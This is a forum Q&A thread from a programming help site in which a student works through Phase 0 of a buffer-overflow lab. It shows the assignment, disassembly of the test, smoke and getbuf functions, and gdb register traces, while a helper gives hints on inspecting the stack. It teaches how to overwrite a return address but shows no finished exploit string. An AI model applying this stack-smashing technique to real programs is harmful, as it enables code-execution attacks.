Question

Buffer Bomb Phase 0

Asked by: purewin

Starting this Buffer Overflow assignment and I'm not really sure how to proceed. Figure I could just use a kick in the right direction. Here is what I've been given:

Also I tried stepping through the code from the very beginning but I kept getting this error

(gdb) s
Single stepping until exit from function __libc_start_main,
which has no line number information.
Warning:
Cannot insert breakpoint 4.
Error accessing memory address 0x19: Input/output error.

I'm not sure what it means.

I know that I need to inject a string somewhere but I don't really understand how to do this or even figure out what the string needs to be....Any Help would be great. Thanks.

Level 0: Candle (10 pts) 
The function getbuf() is called within bufbomb by a function test() having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly */
6 val = getbuf();
7 /* Check for corrupted stack */
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf() executes its return statement (line 5 of getbuf()), the program ordinarily resumes execution within function test() (at line 8 of this function). Within the file bufbomb, there is a function smoke() having the following C code:
void smoke()
{
entry_check(0); /* Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test(). You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf() with the address of the first instruction in smoke(). Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke() causes the program to exit directly. Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a diassembled version of bufbomb.
Be careful about byte ordering.
ou might want to use GDB to step the program through the last few instructions of getbuf() to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf() depends on which version of gcc was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.  
Dump of assembler code for function test:
0x08048f60 <test+0>:    push   %ebp
0x08048f61 <test+1>:    mov    %esp,%ebp
0x08048f63 <test+3>:    sub    $0x18,%esp
0x08048f66 <test+6>:    movl   $0xdeadbeef,0xfffffffc(%ebp)
0x08048f6d <test+13>:   movl   $0x3,(%esp)
0x08048f74 <test+20>:   call   0x8048920 <entry_check>
0x08048f79 <test+25>:   call   0x8048f40 <getbuf>
0x08048f7e <test+30>:   mov    %eax,%edx
0x08048f80 <test+32>:   mov    0xfffffffc(%ebp),%eax
0x08048f83 <test+35>:   cmp    $0xdeadbeef,%eax
0x08048f88 <test+40>:   je     0x8048f98 <test+56>
0x08048f8a <test+42>:   movl   $0x8049780,(%esp)
0x08048f91 <test+49>:   call   0x8048794 <puts@plt>
0x08048f96 <test+54>:   leave  
0x08048f97 <test+55>:   ret    
0x08048f98 <test+56>:   cmp    0x804a1b0,%edx
0x08048f9e <test+62>:   je     0x8048fb2 <test+82>
0x08048fa0 <test+64>:   mov    %edx,0x4(%esp)
0x08048fa4 <test+68>:   movl   $0x8049957,(%esp)
0x08048fab <test+75>:   call   0x8048724 <printf@plt>
0x08048fb0 <test+80>:   leave  
0x08048fb1 <test+81>:   ret    
0x08048fb2 <test+82>:   mov    %edx,0x4(%esp)
0x08048fb6 <test+86>:   movl   $0x804993a,(%esp)
0x08048fbd <test+93>:   call   0x8048724 <printf@plt>
0x08048fc2 <test+98>:   movl   $0x3,(%esp)
0x08048fc9 <test+105>:  call   0x8048a60 <validate>
0x08048fce <test+110>:  leave  
0x08048fcf <test+111>:  ret    
End of assembler dump. 
Dump of assembler code for function smoke:
0x08048d90 <smoke+0>:   push   %ebp
0x08048d91 <smoke+1>:   mov    %esp,%ebp
0x08048d93 <smoke+3>:   sub    $0x8,%esp
0x08048d96 <smoke+6>:   movl   $0x0,(%esp)
0x08048d9d <smoke+13>:  call   0x8048920 <entry_check>
0x08048da2 <smoke+18>:  movl   $0x8049903,(%esp)
0x08048da9 <smoke+25>:  call   0x8048794 <puts@plt>
0x08048dae <smoke+30>:  movl   $0x0,(%esp)
0x08048db5 <smoke+37>:  call   0x8048a60 <validate>
0x08048dba <smoke+42>:  movl   $0x0,(%esp)
0x08048dc1 <smoke+49>:  call   0x80487d4 <exit@plt>
0x08048dc6 <smoke+54>:  lea    0x0(%esi),%esi
0x08048dc9 <smoke+57>:  lea    0x0(%edi),%edi
End of assembler dump. 
Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi
End of assembler dump.

                                  
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:
92:
93:

Select allOpen in new window

This Question has been solved and asker verified All Experts Exchange premium technology solutions are available to subscription members.

Subscribe now for full access to Experts Exchange and get

Instant Access to this Solution

  • Plus...
  • 30 Day FREE access, no risk, no obligation
  • Collaborate with the world's top tech experts
  • Unlimited access to our exclusive solution database
  • Never be left without tech help again

Subscribe Now

Asked On
2009-10-30 at 23:33:18ID24860346
Topics

Assembly Programming Language

,

C Programming Language

,

Miscellaneous Programming

Participating Experts
2
Points
500
Comments
68

Trusted by hundreds of thousands everyday for fast, accurate and reliable tech support.

  • "The time we save is the biggest benefit of Experts Exchange to Warner Bros. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange." Mike Kapnisakis, Warner Bros.
  • "Our team likes having a resource that is more secure than just using Google and most experts using this service really know their stuff. It's nice to look here first versus using Google." Dayna Sellner, Lockheed Martin
  • "Anytime that I've been stumped with a problem, 9 out of 10 times Experts Exchange has either the accepted solution or an open discussion of the potential solution to the problem." Kenny Red, eBay Inc.

See what Experts Exchange can do for you.

Got a question?

We've got the answer.

Experts Exchange has been collecting answers to technology questions since 1996…3 million and counting! If you have a question, chances are we already have your answer.

Screenshot of Experts Exchange Knowledgebase

Need individual assistance?

Our experts are ready to help.

If you can't find the exact answer you're looking for, ask our exclusive community of 50,000 experts. You’ll get a personalized answer from a trusted professional.

Screenshot of Experts Exchange Knowledgebase

Want to learn from the best?

Read articles from industry experts.

Thousands of free tech tips, tricks, how-to’s and tutorials are available in our peer reviewed articles section. See for yourself how smart our experts are, no login required.

Screenshot of an Article

Working on a long term project?

Store your work and research.

Save solutions to your questions, answers you’ve discovered through searching plus helpful articles in your personal knowledgebase for easy future access.

Screenshot of Experts Exchange Knowledgebase

Access the answers to your technology questions today.

Subscribe Now

30-day free trial. Register in 60 seconds.

What Makes Experts Exchange Unique?

Members of the expert community talk about why the experience at Experts Exchange is different than what you will find anywhere else.

Trusted by the world's most respected brands.

image of each brand's logo

Faithfully serving IT professionals since 1996.

Experts Exchange Logo

Try it out and discover for yourself.

Subscribe Now

30-day free trial. Register in 60 seconds.

Related Solutions

  1. buffer overflow bomb
    hi there I have a homework in which I need to enter a string so that the buffer bomb does not exploit and need some help. Here is the disassembly code for the bomb -bash-3.1$ objdump -d bufbomb bufbomb: file format elf32-i386 Disassembly of section .init: 080485fc <...
  2. Buffer Bomb -  Final Phase
    Here is the object dump of my the bomb program: bufbomb: file format elf32-i386 Disassembly of section .init: 080486c8 <_init>: 80486c8: 55 push %ebp 80486c9: 89 e5 mov %esp,%ebp 80486cb: 53 ...
  3. binary bomb phase 3
    i am having trouble with these two lines 0x08048ef2 <phase_3+49>: cmpl $0x7,-0x4(%ebp) 0x08048ef6 <phase_3+53>: ja 0x8048f61 <phase_3+160> i'm not sure what the first line is.... it looks like it compares something to 7. I am afraid t...
  4. binary bomb phase 6
    i'm stuck on phase6, i think it is the linked list that is giving me problems node1 db 76h, 3, 2 dup(0), 1, 3 dup(0), 0F0h, 0A5h, 4, 8 I can get to the last bomb explosion function.... but i can't get past it when i use either of these inputs ( 2 3 1 6 4 5 or 1 ...
  5. Binary Bomb Phase 2
    I'm trying to get the value of the register of eax at the address 0x8048dc0. The assembler dump is below. Basically it reads 6 numbers and compares them to value of eax and the above memory location if I'm correct. I can't quite figure out how to iterate through the loop to ...
  6. Buffer Overflow Bomb Phase 1
    Just wanted to make sure I'm starting in the right direction with this one. I would start off by replacing the call to smoke() from phase 0 with the address of fizz() correct? Level 1: Sparkler (20 pts) Within the file bufbomb there is also a function fizz() having the foll...

Free Tech Articles

  1. WARNING: 5 Reasons why you should NEVER fix a computer for free.
    It is in our nature to love the puzzle. We are obsessed. The lot of us. We love puzzles. We love the challenge. We thrive on finding the answer. We hate disarray. It bothers us deep in our soul. W...
  2. SCCM OSD Basic troubleshooting
    SCCM 2007 OSD is a fantastic way to deploy operating systems, however, like most things SCCM issues can sometimes be difficult to resolve due to the sheer volume of logs to sift through and the dispe...
  3. Migrate Small Business Server 2003 to Exchange 2010 and Windows 2008 R2
    This guide is intended to provide step by step instructions on how to migrate from Small Business Server 2003 to Windows 2008 R2 with Exchange 2010. For this migration to work you will need the fo...
  4. Create a Win7 Gadget
    This article shows you how to create a simple "Gadget" -- a sort of mini-application supported by Windows 7 and Vista. Gadgets can be dropped anywhere on the desktop to provide instant information, ...
  5. Outlook continually prompting for username and password
    There have been a lot of questions recently regarding Outlook prompting for a username and password whilst using Exchange 2007. There are a few reasons why this would happen and I will try to cover t...
  6. Backup Exchange 2010 Information Store using Windows Backup
    There seems to be quite a lot of confusion around the ability to backup Exchange 2010 using the built in Windows Backup feature. This stems from the omission of this feature prior to Exchange 2007 s...

Cloud Class Webinars

  1. Avoiding Bugs in Microsoft Access
    Alison Balter takes and in-depth look at avoiding bugs in Access. In this webinar you will learn about using the immediate window to debug your applications, invoking the debugger, using breakpoints to troubleshoot, stepping through code, setting the next statement to execute, ...
  2. Top 10 Best New Features in Visio 2010
    Scott Helmers gives live demonstrations of the top 10 new features in Visio 2010. This webinar will teach you how to create compelling diagrams by adding shapes to the page with a single click, linking the shapes in a diagram to data in Excel (or SQL Server, or SharePoint), ...
  3. IT Consultant Business Secrets Revealed
    Michael Munger, Experts Exchange tech pro and IT consultant, pulls back the curtain on his very successful businesses and answers question on every IT consultant and business owner should know about. He shares secrets on what he did to solve the 5 most common problems in IT, ...
  4. Disaster Recovery and Business Continuity
    Quest CTO, Mike Billon, gives an overview of the steps involved in building a dunamic disaster recovery plan. Through case studies and an examination of software/hardware tooles for monitoring and testing, you'll gain a better understandin of where you are, where you want ...
  5. Organize Your Visio Diagrams with Containers and Lists
    Scott Helmers uses cross functional flowcharts, wireframe diagrams, data graphic legends and seating charts to teach you: how to ustilize all three new structured diagram components in Visio 2010, the best practices for organizeing shapes in previous version of Visio, how to organize ...
  6. How to Us Objects, Properties, Events and Methods in Microsoft Access
    Alison Dalter gives an in-depbth look at objects, properties, events and methods in Microsoft Access. In this webinar you will learn about using the object browser, referring to objects, working with properties and methods, working with object variables, understanding the ...

Join the Community

Give a Little. Get a Lot.

Join the community of experts here and help other tech pros by answering question in your area of expertise. You can earn FREE access to all Experts Exchange's premium features and resources.

Join the Community

Answers

 

by: purewinPosted on 2009-10-31 at 00:47:53ID: 25708809

Okay so I've figured out that I need to overflow the buffer of 15 characters and then add the address of smoke() at the end correct?

I can't seem to figure out how to get it to work though I keep getting a segmentation fault. Not sure what that means either. Any thoughts?

 

by: purewinPosted on 2009-10-31 at 02:22:11ID: 25708979

Still having trouble determining what is needed to insert the memory address of smoke(). Could use some direction on this.... :(

 

by: Infinity08Posted on 2009-10-31 at 03:33:46ID: 25709125

The assignment very clearly describes what it is you need to do.

But let's see :

>> Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test().

How does the code decide where to return to at the end of the function ?
How can you influence that decision ?

 

by: purewinPosted on 2009-10-31 at 03:51:28ID: 25709168

I can't figure out where on the stack I would need to have the call to smoke() overflow onto. I know it's right before getbuf() returns to test but I can't figure out how to take the memory address of smoke and then enter the correct number of bytes to overflow. Am I entering hex numbers followed by the memory location 0x08048d90 for smoke()? And it looks like I would need to insert it at 0x24 on the stack no? I feel like I'm missing something....

 

by: Infinity08Posted on 2009-10-31 at 03:57:29ID: 25709177

What if you just run the code in the debugger, and take a look at the contents of the stack. And specifically, where the buffer is located on the stack. And where the return address is located on the stack.

 

by: purewinPosted on 2009-10-31 at 04:00:24ID: 25709181

Not sure how I would go about looking at the stack...what sort of commands would that take in gdb I can't think of any atm that would work.

 

by: Infinity08Posted on 2009-10-31 at 04:09:48ID: 25709203

Remember that at any point, the %esp register contains a pointer to the top of the stack.
Also remember that the stack grows downwards.

So, given the address of the top of the stack, you can display any amount of values you wish from the stack.

 

by: purewinPosted on 2009-10-31 at 04:10:23ID: 25709208

Would it be best to just set a breakpoint at the beginning of the program at main and then just use step from there? Or would it be better to set a break point at test() and step from there? The backtrace command I found to look at the stack isn't really provding me with any information at all.

 

by: Infinity08Posted on 2009-10-31 at 04:13:55ID: 25709218

>> Would it be best to just set a breakpoint at the beginning of the program at main and then just use step from there? Or would it be better to set a break point at test() and step from there?

Depends how much stepping you want to do, as well as how deep down you want to observe the changes to the stack.


>> The backtrace command I found to look at the stack isn't really provding me with any information at all.

The backtrace only lists the different stack frames currently on the stack. What you want to know is the actual stack layout - ie. all the data on the stack, including function parameters, return addresses and local variables.

 

by: purewinPosted on 2009-10-31 at 04:15:27ID: 25709221

Am I looking for the most recent reference/location of the esp pointer? And the location of that on the stack is where I would need to overflow to?

 

by: purewinPosted on 2009-10-31 at 04:16:35ID: 25709230

>>The backtrace only lists the different stack frames currently on the stack. What you want to know is the >>actual stack layout - ie. all the data on the stack, including function parameters, return addresses and >>local variables.

Would the info registers command work for this then?

 

by: Infinity08Posted on 2009-10-31 at 04:39:19ID: 25709275

%esp is a register. You can display its contents simply by :

        print $sp

or :

        p/x $sp

or as you say by using 'info registers'.

Furthermore, you can get a single 32bit value (shown in hexadecimal) at the top of the stack using :

        x/1xw $sp

('1' is the amount of values you want to see, 'x' is the format which is hexadecimal in this case, and 'w' says we want to see words or 32-bit values)

or if you want to see more from the top of the stack, eg. 4 :

        x/4xw $sp

Refer to the gdb documentation for more information, and more options :

        http://sourceware.org/gdb/current/onlinedocs/gdb_11.html#SEC72

 

by: purewinPosted on 2009-10-31 at 10:52:08ID: 25710694

I'm still not sure what I need to be looking for in the registers, or how to even tell how many bytes I would need to overflow by. It looks like the call to smoke() would be injected into eax here?

0x08048f51 <getbuf+17>: mov    $0x1,%eax

I mean I understand the buffer overflow concept that I need to insert x amount of characters followed by the memory location of smoke(). I don't know where to go from there though and stepping through the program isn't helping me because I'm no sure what I need to be watching for.

 

by: Infinity08Posted on 2009-10-31 at 11:02:43ID: 25710777

>> I'm still not sure what I need to be looking for in the registers

The only register you need now is the esp register ... the register that points to the top of the stack.

Starting from that address, you can analyze the contents of the stack, and see if you can locate the buffer, return address, etc.

I suggest, you step through the code in the debugger, and at each step you look at the stack contents (the way I showed earlier), and you notice the differences.

 

by: purewinPosted on 2009-10-31 at 11:04:47ID: 25710788

How would I tell where on the stack esp is pointing at on the stack when I reach the return in getbuf()? I have break points set up and tried using info registers and p/x but that doesn't tell me what I was looking for I think. Here is what I did:

I just don't get what I'm missing....

(gdb) break *test
Breakpoint 1 at 0x8048f60
(gdb) break *entry_check
Breakpoint 2 at 0x8048920
(gdb) break *getbuf
Breakpoint 3 at 0x8048f40
(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f60 in test ()
(gdb) si
0x08048f61 in test ()
(gdb) 
0x08048f63 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048920 in entry_check ()
(gdb) 
Continuing. 
Breakpoint 3, 0x08048f40 in getbuf ()
(gdb) si
0x08048f41 in getbuf ()
(gdb) 
0x08048f43 in getbuf ()
(gdb) 
0x08048f46 in getbuf ()
(gdb) 
0x08048f49 in getbuf ()
(gdb) 
0x08048f4c in getbuf ()
(gdb) break *0x08048f56
Breakpoint 4 at 0x8048f56
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f56 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f56        0x8048f56 <getbuf+22>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f57 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f57        0x8048f57 <getbuf+23>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) p/x $0xdeadbeef
$1 = Value can't be converted to integer.
(gdb) backtrace full
#0  0x08048f57 in getbuf ()
No symbol table info available.
#1  0x08049056 in launch ()
No symbol table info available.
#2  0x080492b1 in main ()
No symbol table info available.
(gdb) p/x $esp
$2 = 0xbfffb40c
(gdb) p/x $0xbfffv40c
$3 = Value can't be converted to integer.
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:
92:
93:

Select allOpen in new window

 

by: Infinity08Posted on 2009-10-31 at 11:10:35ID: 25710816

>> How would I tell where on the stack esp is pointing at on the stack when I reach the return in getbuf()?

esp is ALWAYS pointing to the top of the stack.

Just step through the code, and at every step, take note of the stack contents ... See what changes, and draw your conclusions from that.

You do know what the stack is, do you ?

        http://en.wikipedia.org/wiki/Call_stack

 

by: purewinPosted on 2009-10-31 at 11:18:41ID: 25710859

Right i know esp is always pointing to the top of the stack. Based on that link it looks like my problem is that how do I know what register the return value is stored? Is it always the same register or should I not even be looking for that?

(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f60 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb42c       0xbfffb42c
ebp            0xbfffe9f8       0xbfffe9f8
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f60        0x8048f60 <test>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f61 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb428       0xbfffb428
ebp            0xbfffe9f8       0xbfffe9f8
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f61        0x8048f61 <test+1>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f63 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb428       0xbfffb428
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f63        0x8048f63 <test+3>
eflags         0x246    [ PF ZF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f66 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f66        0x8048f66 <test+6>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f6d in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f6d        0x8048f6d <test+13>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f74 in test ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f74        0x8048f74 <test+20>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si 
Breakpoint 2, 0x08048920 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048920        0x8048920 <entry_check>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048921 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048921        0x8048921 <entry_check+1>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048923 in entry_check ()
(gdb) info registers
eax            0xc      12
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048923        0x8048923 <entry_check+3>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048926 in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048926        0x8048926 <entry_check+6>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048927 in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048927        0x8048927 <entry_check+7>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x0804892c in entry_check ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x804892c        0x804892c <entry_check+12>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f79 in test ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f79        0x8048f79 <test+25>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si 
Breakpoint 3, 0x08048f40 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f40        0x8048f40 <getbuf>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f41 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f41        0x8048f41 <getbuf+1>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f43 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb408       0xbfffb408
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f43        0x8048f43 <getbuf+3>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f46 in getbuf ()
(gdb) info registers
eax            0x3      3
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f46        0x8048f46 <getbuf+6>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f49 in getbuf ()
(gdb) info registers
eax            0xbfffb3fc       -1073761284
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f49        0x8048f49 <getbuf+9>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f4c in getbuf ()
(gdb) info registers
eax            0xbfffb3fc       -1073761284
ecx            0x0      0
edx            0x8590d0 8753360
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f4c        0x8048f4c <getbuf+12>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048dd0 in Gets ()
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f56 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb3f0       0xbfffb3f0
ebp            0xbfffb408       0xbfffb408
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f56        0x8048f56 <getbuf+22>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) si
0x08048f57 in getbuf ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb40c       0xbfffb40c
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f57        0x8048f57 <getbuf+23>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) p/x (esp-18)
No symbol table is loaded.  Use the "file" command.
(gdb) p/x *(esp-18)
No symbol table is loaded.  Use the "file" command.
(gdb) p/x esp
No symbol table is loaded.  Use the "file" command.
(gdb) p/x *esp
No symbol table is loaded.  Use the "file" command.
